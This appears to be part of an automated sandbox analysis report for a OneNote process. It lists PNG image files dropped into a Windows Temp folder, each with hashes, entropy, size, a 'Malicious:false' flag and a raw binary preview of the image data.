                                                                                                                                                    SSDEEP:24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
                                                                                                                                                    MD5:C2BF462C1311A92660999498F29394BD
                                                                                                                                                    SHA1:4BD7C156F172C1114F33D80BAB05252C9F8E87C0
                                                                                                                                                    SHA-256:5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
                                                                                                                                                    SHA-512:1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P*.(....}:&'ldc...c|.bs.>z.:?.M....(.SR..a..o..*=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....|.4.,/......=.z%.F....*Z...>.*.A.....?.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{053808ED-A823-43D4-B7CE-AD53FBCCEA07}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):7.837610270261933
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                    MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                    SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                    SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                    SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{05A11B15-896E-4291-A74E-B32FD8C5FCB8}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{05C26474-B79F-440C-AF51-8AF8DFB93FEB}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3679
                                                                                                                                                    Entropy (8bit):7.931319059366604
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                    MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                    SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                    SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                    SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{1393251E-863A-422A-AFE0-46368B47935D}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):76485
                                                                                                                                                    Entropy (8bit):7.79809544163696
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
                                                                                                                                                    MD5:734BA03175EBC8B8E3EF57BC3DDC9D8E
                                                                                                                                                    SHA1:1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
                                                                                                                                                    SHA-256:275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
                                                                                                                                                    SHA-512:23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......*......v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{1446C4F2-FA63-4782-87AC-6D2620EBBF7C}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{14E5622A-6AFA-4099-A7F6-553D29AAF903}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1924
                                                                                                                                                    Entropy (8bit):7.836744258175623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                    MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                    SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                    SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                    SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{150E099A-9CB1-46FE-929D-FBA8FAEEBB43}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22634
                                                                                                                                                    Entropy (8bit):7.974332204835705
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                    MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                    SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                    SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                    SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{16C683EC-AFC0-46C0-A881-2CE20AB3EC36}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1657
                                                                                                                                                    Entropy (8bit):7.80882577056055
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                    MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                    SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                    SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                    SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{16F2CCD3-7155-4342-AAAB-D953EC136172}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13084
                                                                                                                                                    Entropy (8bit):7.940058639272698
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                    MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                    SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                    SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                    SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{1718266F-658B-40B4-8876-19AC9018A8CF}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11332
                                                                                                                                                    Entropy (8bit):7.9324721568775285
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                    MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                    SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                    SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                    SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{183C2899-6A9F-4D0A-BC4D-3C1956484210}.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7374
                                                                                                                                                    Entropy (8bit):7.955141875077912
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                    MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                    SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                    SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                    SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{18586D77-A491-41E1-9B55-484FAC587C99}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1657
                                                                                                                                                    Entropy (8bit):7.80882577056055
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                    MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                    SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                    SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                    SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                    Malicious:false
